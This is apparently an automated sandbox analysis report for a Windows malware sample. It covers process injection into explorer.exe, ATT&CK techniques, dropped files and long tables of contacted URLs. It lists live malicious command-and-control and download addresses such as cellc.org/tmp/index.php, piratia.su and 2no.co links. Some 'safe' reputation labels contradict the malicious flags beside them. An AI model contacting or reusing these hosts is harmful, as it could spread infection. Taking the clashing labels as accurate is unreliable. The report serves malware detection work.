        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Code function: 10_2_007B1C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,10_2_007B1C61
        Source: C:\Users\user\AppData\Roaming\ssjhrji | Code function: 19_2_00B52263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,19_2_00B52263
        Source: C:\Users\user\AppData\Roaming\ssjhrji | Code function: 19_2_00B51C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,19_2_00B51C61
        MITRE ATT&CK Matrix (tactic columns: Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact). Only the techniques the report flags are listed below; the number before each technique is the signature-count badge as shown on the page.
        Reconnaissance: no flagged techniques
        Resource Development: no flagged techniques
        Initial Access: 2 Valid Accounts
        Execution: 1 Windows Management Instrumentation; 1 Native API; 1 Exploitation for Client Execution
        Persistence: 1 DLL Side-Loading; 2 Valid Accounts
        Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 DLL Side-Loading; 2 Valid Accounts; 21 Access Token Manipulation; 412 Process Injection
        Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 1 DLL Side-Loading; 111 Masquerading; 2 Valid Accounts; 22 Virtualization/Sandbox Evasion; 21 Access Token Manipulation; 412 Process Injection; 1 Hidden Files and Directories
        Credential Access: 21 Input Capture
        Discovery: 2 System Time Discovery; 1 Account Discovery; 13 File and Directory Discovery; 17 System Information Discovery; 1 Query Registry; 431 Security Software Discovery; 22 Virtualization/Sandbox Evasion; 4 Process Discovery; 11 Application Window Discovery; 1 System Owner/User Discovery; 1 Remote System Discovery; 1 System Network Configuration Discovery
        Lateral Movement: no flagged techniques
        Collection: 1 Archive Collected Data; 1 Data from Local System; 21 Input Capture; 3 Clipboard Data
        Command and Control: 4 Ingress Tool Transfer; 11 Encrypted Channel; 4 Non-Application Layer Protocol; 115 Application Layer Protocol
        Exfiltration: no flagged techniques
        Impact: 1 System Shutdown/Reboot
        Behavior Graph ID: 1435516; Sample: file.exe; Startdate: 02/05/2024; Architecture: WINDOWS; Score: 100
        DNS/IP nodes: rgcVXPIqSMzHmoPyVwzhcGh.rgcVXPIqSMzHmoPyVwzhcGh; cellc.org; 2no.co
        Sample-level signatures: Snort IDS alert for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 6 other signatures
        Process chain (the numbers the graph prints after a process name are its created-file and created-registry-value counts):
        file.exe 59 (started) -> dropped C:\Users\user\AppData\Local\...\Alexandria, PDP-11; started cmd.exe 2
        ssjhrji 1 10 (started)
        cmd.exe 2 -> dropped C:\Users\user\AppData\Local\...xistence.pif, PE32; signatures: Uses ping.exe to sleep; Drops PE files with a suspicious file extension; Uses ping.exe to check the status of other devices and networks; started Existence.pif 12, PING.EXE 1, cmd.exe 2 and 7 other processes
        Existence.pif 12 -> 2no.co 104.21.79.229, 443, 49734 CLOUDFLARENETUS United States; signatures: Found API chain indicative of debugger detection; Injects a PE file into a foreign processes; started Existence.pif (second instance)
        PING.EXE 1 -> 127.0.0.1 unknown unknown
        Existence.pif (second instance) -> signatures: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)); Maps a DLL or memory area into another process; 2 other signatures; injected explorer.exe 8 3
        explorer.exe 8 3 (injected) -> cellc.org 186.10.34.243, 49744, 49745, 49746 ENTELCHILESACL Chile; dropped C:\Users\user\AppData\Roaming\ssjhrji, PE32; signatures: System process connects to network (likely due to code injection or exploit); Benign windows process drops PE files; Hides that the sample has been downloaded from the Internet (zone.identifier)

        Source | Detection | Scanner | Label | Link
        file.exe | 18% | ReversingLabs | |
        file.exe | 100% | Joe Sandbox ML | |
        Source | Detection | Scanner | Label | Link
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | 0% | ReversingLabs | |
        C:\Users\user\AppData\Roaming\ssjhrji | 0% | ReversingLabs | |
        No Antivirus matches
        No Antivirus matches
        Source | Detection | Scanner | Label | Link
        https://simpleflying.com/how-do-you-become-an-air-traffic-controller/ | 0% | URL Reputation | safe |
        http://purl.oen | 0% | URL Reputation | safe |
        http://schemas.micr | 0% | URL Reputation | safe |
        https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img | 0% | URL Reputation | safe |
        https://outlook.com_ | 0% | URL Reputation | safe |
        http://schemas.mi | 0% | URL Reputation | safe |
        https://powerpoint.office.comcember | 0% | URL Reputation | safe |
        http://ocsps.ssl.com0 | 0% | URL Reputation | safe |
        http://schemas.micro | 0% | URL Reputation | safe |
        http://yyyjoidqibgvbs.net/ | 0% | Avira URL Cloud | safe |
        https://2no.co/16G965u | 100% | Avira URL Cloud | malware |
        http://uwgftqaxwugurgs.com/ | 0% | Avira URL Cloud | safe |
        http://uwgftqaxwugurgs.com/application/x-www-form-urlencodedMozilla/5.0 | 0% | Avira URL Cloud | safe |
        https://2no.co/16G965Z | 100% | Avira URL Cloud | malware |
        http://qkoxdyhgicus.org/gs | 0% | Avira URL Cloud | safe |
        http://cellc.org/tmp/index.php.ini | 0% | Avira URL Cloud | safe |
        http://qkoxdyhgicus.org/ | 0% | Avira URL Cloud | safe |
        http://dgqkmisxnbbni.net/ | 0% | Avira URL Cloud | safe |
        http://cellc.org/tmp/index.php | 0% | Avira URL Cloud | safe |
        https://2no.co/ | 100% | Avira URL Cloud | malware |
        http://cellc.org:80/tmp/index.phpP | 0% | Avira URL Cloud | safe |
        http://cellc.org/tmp/index.phpZ | 0% | Avira URL Cloud | safe |
        http://cellc.org/tmp/index.phpc | 0% | Avira URL Cloud | safe |
        http://cellc.org:80/tmp/index.php | 0% | Avira URL Cloud | safe |
        http://cellc.org/n | 0% | Avira URL Cloud | safe |
        http://khjhprifrxebx.net/ | 0% | Avira URL Cloud | safe |
        http://ndsmsdugaunva.net/ | 0% | Avira URL Cloud | safe |
        http://piratia.su/tmp/index.php | 100% | Avira URL Cloud | malware |
        http://cellc.org/p | 0% | Avira URL Cloud | safe |
        http://cellc.org/s | 0% | Avira URL Cloud | safe |
        http://cellc.org/tmp/index.phpngsV | 0% | Avira URL Cloud | safe |
        http://h-c-v.ru/tmp/index.php | 100% | Avira URL Cloud | malware |
        http://ndsmsdugaunva.net/gs | 0% | Avira URL Cloud | safe |
        http://cellc.org/tmp/index.phpngsA | 0% | Avira URL Cloud | safe |
        https://2no.co/16G965 | 100% | Avira URL Cloud | malware |
        http://jyvmasmiydvgjuu.org/s | 0% | Avira URL Cloud | safe |
        http://cellc.org/ | 0% | Avira URL Cloud | safe |
        http://jyvmasmiydvgjuu.org/ | 0% | Avira URL Cloud | safe |
        http://cellc.org/tmp/index.phprk | 0% | Avira URL Cloud | safe |
        http://cellc.org/tmp/index.php&jz | 0% | Avira URL Cloud | safe |
        http://cellc.org/tmp/index.php/m | 0% | Avira URL Cloud | safe |
        http://icebrasilpr.com/tmp/index.php | 0% | Avira URL Cloud | safe |
        http://cellc.org/tmp/index.phpngs | 0% | Avira URL Cloud | safe |
        http://cellc.org/B | 0% | Avira URL Cloud | safe |
        Name | IP | Active | Malicious | Antivirus Detection | Reputation
        2no.co | 104.21.79.229 | true | false | | unknown
        cellc.org | 186.10.34.243 | true | true | | unknown
        rgcVXPIqSMzHmoPyVwzhcGh.rgcVXPIqSMzHmoPyVwzhcGh | unknown | unknown | true | | unknown
        Name | Malicious | Antivirus Detection | Reputation
        http://cellc.org/tmp/index.php | true | Avira URL Cloud: safe | unknown
        http://piratia-life.ru/tmp/index.php | false | | high
        http://piratia.su/tmp/index.php | true | Avira URL Cloud: malware | unknown
        http://h-c-v.ru/tmp/index.php | true | Avira URL Cloud: malware | unknown
        https://2no.co/16G965 | false | Avira URL Cloud: malware | unknown
        http://icebrasilpr.com/tmp/index.php | true | Avira URL Cloud: safe | unknown
        Name | Source | Malicious | Antivirus Detection | Reputation
        https://aka.ms/odirmr | explorer.exe, 00000011.00000002.2867686407.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.00000000079FB000.00000004.00000001.00020000.00000000.sdmp | false | | high
        http://cert.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.cer0Q | file.exe | false | | high
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV | explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | high
        https://api.msn.com:443/v1/news/Feed/Windows? | explorer.exe, 00000011.00000000.2276485731.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2870173011.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | high
        https://android.notify.windows.com/iOSN | explorer.exe, 00000011.00000002.2873048284.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | false | | high
        https://android.notify.windows.com/iOSE | explorer.exe, 00000011.00000002.2873048284.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | false | | high
        https://excel.office.com | explorer.exe, 00000011.00000000.2279035434.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2873048284.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | false | | high
        http://yyyjoidqibgvbs.net/ | explorer.exe, 00000011.00000002.2874517414.000000000CAB6000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
        https://www.autoitscript.com/autoit3/ | file.exe, 00000000.00000003.1602868846.0000000002826000.00000004.00000020.00020000.00000000.sdmp, Cube.0.dr, Existence.pif.1.dr, ssjhrji.17.dr | false | | high
        https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we | explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | high
        https://simpleflying.com/how-do-you-become-an-air-traffic-controller/ | explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        http://purl.oen | ssjhrji, 00000013.00000002.2866115104.0000000003D96000.00000004.00000020.00020000.00000000.sdmp, ssjhrji, 00000013.00000003.2538497281.0000000003D96000.00000004.00000020.00020000.00000000.sdmp, ssjhrji, 00000013.00000003.2537510876.0000000003D96000.00000004.00000020.00020000.00000000.sdmp, ssjhrji, 00000013.00000003.2536709501.0000000003D97000.00000004.00000020.00020000.00000000.sdmp, ssjhrji, 00000013.00000003.2535914841.0000000003D97000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        http://qkoxdyhgicus.org/ | explorer.exe, 00000011.00000002.2873048284.000000000C964000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2874517414.000000000CAB6000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
        http://uwgftqaxwugurgs.com/ | explorer.exe, 00000011.00000002.2873048284.000000000C964000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2874517414.000000000CADE000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY | explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | high
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark | explorer.exe, 00000011.00000000.2274432480.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2867686407.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | false | | high
        https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe | explorer.exe, 00000011.00000000.2279035434.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2873048284.000000000C893000.00000004.00000001.00020000.00000000.sdmp | false | | high
        https://wns.windows.com/ | explorer.exe, 00000011.00000002.2874517414.000000000CADE000.00000004.00000001.00020000.00000000.sdmp | false | | high
        https://android.notify.windows.com/iOSd | explorer.exe, 00000011.00000002.2873048284.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | false | | high
        https://2no.co/16G965u | Existence.pif, 0000000A.00000002.2230160337.00000000014F5000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
        https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg | explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | high
        https://wns.windows.com/L | explorer.exe, 00000011.00000000.2279035434.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2873048284.000000000C557000.00000004.00000001.00020000.00000000.sdmp | false | | high
        http://uwgftqaxwugurgs.com/application/x-www-form-urlencodedMozilla/5.0 | explorer.exe, 00000011.00000002.2874517414.000000000CADE000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
        https://word.office.com | explorer.exe, 00000011.00000000.2279035434.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2873048284.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | false | | high
        https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings | explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | high
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu | explorer.exe, 00000011.00000000.2274432480.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2867686407.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | false | | high
        https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win | explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | high
        https://2no.co/16G965Z | Existence.pif, 0000000A.00000002.2230160337.00000000014F5000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
        http://www.autoitscript.com/autoit3/X | file.exe, 00000000.00000003.1634632525.0000000002823000.00000004.00000020.00020000.00000000.sdmp, Existence.pif, 0000000A.00000000.1679486685.0000000000805000.00000002.00000001.01000000.00000005.sdmp, Existence.pif, 00000010.00000002.2288146522.0000000000805000.00000002.00000001.01000000.00000005.sdmp, ssjhrji, 00000013.00000002.2864587716.0000000000BA5000.00000002.00000001.01000000.00000008.sdmp, Spell.0.dr, Existence.pif.1.dr, ssjhrji.17.dr | false | | high
        https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew | explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | high
        http://nsis.sf.net/NSIS_ErrorError | file.exe | false | | high
        http://schemas.micr | explorer.exe, 00000011.00000000.2277176998.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2870993996.00000000098A8000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow- | explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | high
        http://dgqkmisxnbbni.net/ | explorer.exe, 00000011.00000002.2874517414.000000000CAB6000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu | explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | high
        http://qkoxdyhgicus.org/gs | explorer.exe, 00000011.00000002.2874517414.000000000CAB6000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark | explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | high
        https://www.rd.com/list/polite-habits-campers-dislike/ | explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | high
        https://android.notify.windows.com/iOS | explorer.exe, 00000011.00000000.2279035434.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2873048284.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | false | | high
        https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp | explorer.exe, 00000011.00000002.2873048284.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | false | | high
        http://cellc.org/tmp/index.php.ini | explorer.exe, 00000011.00000002.2864144911.0000000001248000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
        https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img | explorer.exe, 00000011.00000000.2274432480.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2867686407.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        http://cellc.org/tmp/index.phpc | explorer.exe, 00000011.00000002.2864144911.0000000001248000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
        https://outlook.com_ | explorer.exe, 00000011.00000000.2279035434.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2873048284.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | low
        http://cellc.org:80/tmp/index.phpP | explorer.exe, 00000011.00000002.2874517414.000000000CADE000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
        https://2no.co/ | Existence.pif, 0000000A.00000003.2226148637.000000000144C000.00000004.00000020.00020000.00000000.sdmp, Existence.pif, 0000000A.00000003.2226071840.0000000001435000.00000004.00000020.00020000.00000000.sdmp, Existence.pif, 0000000A.00000002.2229992386.0000000001453000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
        http://cellc.org/tmp/index.phpZ | explorer.exe, 00000011.00000002.2864144911.0000000001248000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
        https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe | explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | high
                                                                            https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-atexplorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://schemas.miexplorer.exe, 00000011.00000000.2277176998.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2870993996.00000000098A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-clexplorer.exe, 00000011.00000002.2867686407.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://powerpoint.office.comcemberexplorer.exe, 00000011.00000000.2279035434.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2873048284.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                http://khjhprifrxebx.net/explorer.exe, 00000011.00000002.2874517414.000000000CAB6000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                http://ocsps.ssl.com0file.exefalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://ndsmsdugaunva.net/explorer.exe, 00000011.00000002.2874517414.000000000CAB6000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://schemas.microexplorer.exe, 00000011.00000000.2277365932.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000011.00000002.2869423152.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000011.00000000.2275324943.0000000007F40000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  http://cellc.org:80/tmp/index.phpexplorer.exe, 00000011.00000002.2874517414.000000000CADE000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://cellc.org/nexplorer.exe, 00000011.00000002.2874517414.000000000CAB6000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://cellc.org/pexplorer.exe, 00000011.00000002.2874517414.000000000CAB6000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://cellc.org/sexplorer.exe, 00000011.00000002.2874517414.000000000CAB6000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    http://cellc.org/tmp/index.phpngsVexplorer.exe, 00000011.00000002.2874517414.000000000CAB6000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-miexplorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://api.msn.com/qexplorer.exe, 00000011.00000000.2276485731.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2870173011.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://www.ssl.com/repository0file.exefalse
                                                                                          high
                                                                                          https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&ocexplorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svgexplorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-darkexplorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-Aexplorer.exe, 00000011.00000000.2274432480.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2867686407.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://crls.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.crl0file.exefalse
                                                                                                      high
                                                                                                      http://ndsmsdugaunva.net/gsexplorer.exe, 00000011.00000002.2874517414.000000000CAB6000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      http://cellc.org/tmp/index.phpngsAexplorer.exe, 00000011.00000002.2874517414.000000000CAB6000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      http://cellc.org/tmp/index.phprkexplorer.exe, 00000011.00000002.2873048284.000000000C964000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headereventexplorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://jyvmasmiydvgjuu.org/explorer.exe, 00000011.00000002.2874485823.000000000CA42000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        http://jyvmasmiydvgjuu.org/sexplorer.exe, 00000011.00000002.2874485823.000000000CA42000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://aka.ms/Vh5j3kexplorer.exe, 00000011.00000002.2867686407.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://cellc.org/explorer.exe, 00000011.00000002.2874485823.000000000CA42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2874517414.000000000CAB6000.00000004.00000001.00020000.00000000.sdmptrue
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://api.msn.com/v1/news/Feed/Windows?&explorer.exe, 00000011.00000000.2276485731.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2870173011.00000000096DF000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://crls.ssl.com/ssl.com-rsa-RootCA.crl0file.exefalse
                                                                                                              high
                                                                                                              https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svgexplorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://cellc.org/tmp/index.php/mexplorer.exe, 00000011.00000002.2874517414.000000000CAB6000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                http://cellc.org/tmp/index.php&jzexplorer.exe, 00000011.00000002.2873048284.000000000C964000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/arexplorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  high
